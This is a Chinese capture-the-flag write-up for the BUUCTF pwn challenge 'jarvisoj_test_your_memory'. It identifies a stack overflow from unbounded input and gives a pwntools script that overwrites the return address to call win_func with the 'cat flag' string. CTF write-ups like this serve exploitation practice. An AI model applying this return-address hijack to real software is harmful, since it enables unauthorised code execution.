当前位置: 首页 > news >正文

[buuctf]jarvisoj_test_your_memory

首先查看一下文件的保护措施
image
在用ida打开看一下
image
这里的s在进行输入的时候可以输入没有长度限制的字符串,很明显存在栈溢出
然后观察一下函数的列表,存在一个win_func的函数
image
这里明显直接可以进行系统调用,直接传入命令即可
当然这里也有system函数可以直接使用
在打开字符串窗口,有 cat flag
image
直接就可以获得flag

点击查看代码
from pwn import *
io=remote("node5.buuoj.cn",27082)
cat_flag=0x080487E0
system=0x08048440
win_func=0x080485BD
payload=b"A"*(0x13+4)+p32(win_func)+p32(0x08048677)+p32(cat_flag)
io.sendline(payload)
io.interactive()
http://www.jsqmd.com/news/28631/

相关文章:

  • FinalShell破解专业版(SSH工具) v4.5.12 中文绿色版
  • 2025 年 11 月磁混凝厂家最新推荐,实力品牌深度解析采购无忧之选!
  • HarfBuzz 实战:五大核心API 实例详解【附iOS/Swift实战示例】
  • Java 获取 MultipartFile
  • 革命性的智能文档处理与问答引擎
  • 20251101
  • 第12天(中等题 越长越合法滑动窗口)
  • 正式发布!2025年11月广州心理咨询机构哪家专业?
  • 大模型开发 - 02 Spring AI Concepts - 详解
  • Zookeeper环境搭建
  • 2025 年 11 月降膜蒸发器,结晶蒸发器,真空浓缩器厂家最新推荐,聚焦资质、案例、售后的五家机构深度解读
  • 十月第四周组会报告ppt--CBANet面向学习中心和边界感知的3D牙齿分割实例表示(Computersgraphics) 2025.8
  • 2025 年 11 月废水蒸发器,多效蒸发器,低温蒸发器厂家最新推荐,产能、专利、环保三维数据透视
  • Java方法——可变参数
  • 2025 年 11 月曝气器厂家最新推荐,专业制造与品牌保障口碑之选
  • sigmoid函数求导
  • [20251028]SQLPlus的行编辑器.txt
  • 【深基7.例4】歌唱比赛
  • 美团多智能体WOWService智能系统概要
  • Python 潮流周刊#125:个人 AI 笔记本工具
  • Java方法——方法的重载、命令行传参
  • 2025 年 11 月石灰料仓厂家最新推荐,聚焦资质、案例、售后的五家机构深度解读
  • 2025 年 11 月石灰料仓厂家最新推荐,技术实力与市场口碑深度解析
  • Ubuntu 22.04 LTS 安装 gitlab
  • SecureCRT 9.6.4 中文便携+绿色版 - 终端工具
  • Day28-C:\Users\Lenovo\Desktop\note\code\JavaSE\Basic\src\com\IPDemo\BSDemo+TCP
  • Linux桌面折腾小记
  • CSP-S邮寄
  • 关于使用Prism的View和ViewModel不能关联问题
  • Elasticsearch命令执行增删改查